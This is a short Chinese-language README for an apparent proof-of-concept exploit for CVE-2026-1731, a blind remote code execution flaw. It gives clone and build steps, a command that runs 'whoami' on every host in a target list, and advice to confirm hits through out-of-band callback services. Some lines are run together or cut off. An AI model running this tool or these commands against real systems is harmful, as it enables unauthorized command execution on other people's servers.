如需更多信息,建议您阅读 attackerkb.com 上的分析。
构建此 PoC 需要以下工具: Git、rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 二进制文件将位于 target/release 目录中cd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
您可以运行 ./CVE-2026-1731 -h 查看可用选项列表
./CVE-2026-1731 --targets targets.txt --command "whoami"
注意: 由于 CVE-2026-1731 是盲式 RCE,主机不会返回任何可用于判断漏洞的响应。请求可能成功,但未受漏洞影响的目标不会触发 RCE。建议您使用 webhook.site 或 PortSwigger's Burp Collaborator 等服务对目标进行测试。此 PoC 的成功或失败取决于服务器是否返回状态码 200。
GET /get_rdf?comp=sdcust&locale_code=en-us 端点添加版本检查。https://github.com/win3zz/CVE-2026-1731
https://nvd.nist.gov/vuln/detail/CVE-2026-1731